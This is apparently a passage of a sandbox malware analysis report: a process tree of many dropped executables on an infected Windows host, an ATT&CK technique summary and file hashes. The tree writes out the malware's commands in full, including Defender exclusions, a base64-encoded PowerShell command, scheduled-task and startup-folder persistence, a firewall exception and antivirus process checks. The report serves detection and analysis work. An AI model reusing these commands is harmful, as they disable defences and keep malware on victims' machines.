C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:4036
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:1512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1832728749.exeC:\Users\Admin\AppData\Local\Temp\1832728749.exe7⤵
- Executes dropped EXE
PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\1665822621.exeC:\Users\Admin\AppData\Local\Temp\1665822621.exe7⤵
- Executes dropped EXE
PID:3092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\testme.exe"C:\Users\Admin\AppData\Local\Temp\Files\testme.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:2352 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\testme.exe" "testme.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd6⤵PID:1284
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:1232
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3916
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7683187⤵
- System Location Discovery: System Language Discovery
PID:1212
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PhoneAbcSchedulesApr" Nbc7⤵
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B7⤵PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif768318\Paraguay.pif 768318\B7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2120 -
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit8⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:3472
-
-
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pifC:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif8⤵
- System Location Discovery: System Language Discovery
PID:5352
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
PID:4060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp2.exe"C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp2.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3208
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"6⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4344
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\processclass.exe"C:\Users\Admin\AppData\Local\Temp\Files\processclass.exe"5⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe"C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe"5⤵PID:2448
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"5⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4244 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"5⤵
- Adds Run key to start application
PID:3464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==6⤵PID:4780
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe"5⤵PID:4180
-
-
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"4⤵
- System Location Discovery: System Language Discovery
PID:112 -
C:\Users\Admin\AppData\Local\Temp\Files\setup8.exe"C:\Users\Admin\AppData\Local\Temp\Files\setup8.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\Files\meteran.exe"C:\Users\Admin\AppData\Local\Temp\Files\meteran.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\Files\o.exe"C:\Users\Admin\AppData\Local\Temp\Files\o.exe"5⤵
- Executes dropped EXE
PID:904
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:3068
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2464
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3692
-
-
C:\Users\Admin\AppData\Local\Temp\Files\channel.exe"C:\Users\Admin\AppData\Local\Temp\Files\channel.exe"5⤵
- Executes dropped EXE
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat6⤵PID:2748
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:2376
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"7⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1632
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"7⤵
- System Location Discovery: System Language Discovery
PID:996
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7245987⤵PID:3524
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "WowLiberalCalOfficer" Weight7⤵
- System Location Discovery: System Language Discovery
PID:3248
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y7⤵
- System Location Discovery: System Language Discovery
PID:3452
-
-
C:\Users\Admin\AppData\Local\Temp\724598\Thermal.pifThermal.pif y7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5964
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵PID:2700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"5⤵
- System Location Discovery: System Language Discovery
PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\Files\c2.exe"C:\Users\Admin\AppData\Local\Temp\Files\c2.exe"5⤵PID:5388
-
C:\Windows\system32\notepad.exenotepad.exe6⤵PID:6168
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\procx64.exe"C:\Users\Admin\AppData\Local\Temp\Files\procx64.exe"5⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\Files\x64\pomadachashin.exe"C:\Users\Admin\AppData\Local\Temp\Files\x64\pomadachashin.exe"6⤵
- Enumerates connected drives
- Checks system information in the registry
- Checks processor information in registry
PID:5308
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe"C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe"5⤵PID:4312
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "6⤵PID:6840
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.execlamer.exe -priverdD7⤵PID:6868
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"8⤵
- Drops file in Windows directory
PID:2184
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"4⤵
- Modifies system certificate store
PID:3496 -
C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"5⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"6⤵PID:5704
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Steam.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Steam.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6708
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Steam" /tr "C:\Users\Admin\AppData\Roaming\Steam.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"5⤵PID:6520
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CovidPass.exe"C:\Users\Admin\AppData\Local\Temp\Files\CovidPass.exe"5⤵PID:6216
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit6⤵PID:6660
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpFAE2.tmp.bat""6⤵
- System Location Discovery: System Language Discovery
PID:2136 -
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:1996
-
-
C:\Users\Admin\AppData\Roaming\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\c1.exe"C:\Users\Admin\AppData\Local\Temp\Files\c1.exe"5⤵PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:352
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe"C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe"5⤵
- Suspicious use of SetWindowsHookEx
PID:4880
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:440 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3788
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:3784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:908 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2940
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1968
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1508
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Characteristic" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F2⤵PID:3340
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Characteristic" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:3352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & echo URL="C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & exit2⤵
- Drops startup file
PID:2444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:3552 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2500
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:1692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:5512 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:6812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\Admin\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit2⤵
- Drops startup file
PID:2488
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2560
-
C:\Windows\system32\taskeng.exetaskeng.exe {B0596C09-F3C0-486E-842F-95003622E877} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]1⤵
- Loads dropped DLL
PID:3836 -
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3832
-
-
C:\Users\Admin\AppData\Roaming\Steam.exeC:\Users\Admin\AppData\Roaming\Steam.exe2⤵PID:1384
-
-
C:\ProgramData\fsoieb\oxjuj.exeC:\ProgramData\fsoieb\oxjuj.exe2⤵
- System Location Discovery: System Language Discovery
PID:5164
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x14c1⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3156 -
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"2⤵
- Executes dropped EXE
PID:336
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Indicator Removal
1File Deletion
1Modify Registry
6Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5f357d927cb6dee29800be14f8c3df21e
SHA189cf219df24dd6edd52ce8e65213b3b14e6e5f32
SHA256a25820e0815c044cc7a71126408c23f514b1b7cd118621ea8bc3680202733ca7
SHA512d87d104a81af619d39394af54c49ab7d1aa32ddc23e185b59624fb7527cea080aa276c78a3818525e0f6e0c584350326367f300a36a154771ecbde648fa38748
-
Filesize
334B
MD588f6599d557ec2b7a12b3ab4faf3c364
SHA11bc917d0543deee57c7e13f7ed182c8692e69458
SHA256781cf1f98ccd2cf18079967e28996a722e75fa28cb2ecc8b638e2efcdf751e8d
SHA512d1633a186dbc849f8c056bd53df4b24f972f170cb4e602b487d89b9762ce78699cf148d70f62272e8e2d13888a73b38910b43c378af8d21102a3fd2e08731d19
-
Filesize
1KB
MD555540a230bdab55187a841cfe1aa1545
SHA1363e4734f757bdeb89868efe94907774a327695e
SHA256d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb
SHA512c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
Filesize230B
MD5169755fad30417e982f0b24e73d2cf6d
SHA187b09b9976abda44dbba9fe5c1989cffc20a3337
SHA256a3209db126d6541fb5abf9e95f6dbf4444aa20f0bb2e6bd6486ee2340b6b384c
SHA51276e0cca16ab6cbc451855f50a1db660c499c1ad5f76c9e45e533b1d3446ced670a2a9e476b8c34f09ea531df74334832cf68dffa751a1fc6897f06f2de51227f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD582dde02b6fd6ff1ec173f77055dd4aac
SHA18af72f396ee567ec12a72fcc3a4ff37a8cb98c75
SHA25681ac2b05141ecfca2040392c14dcaeeebe86b2ae1cce25c4218dfe687d8acb92
SHA51239efe041803fde2091d928f7d334bbb9a173c6c3edab2163adbb12e35156d2a4dadadbcbb538facec1b928f632a9da234ddbbc3f4a67f29d84e348c0ba125c1c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55511d2e3c22fe82b380f6d0b1943567c
SHA123136aeba8764b18db8fa9d5b8407980d6f825f6
SHA256bebb52dbf3f0c372de5226b3bb41838df6c45d5e3ffef03b595987df584b9063
SHA512ac10ab8b0ca37639d66dae67dde0eb803cd077b06c27aa117c1f8deff39f21526569525563fe4985911081db45a3fc1f7f64ffcc892addc8f60e0552c9ed84e4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d86ddd40d332269c9a58b07109573568
SHA17809f4620316ac70cf27738315a20081c52c2cdc
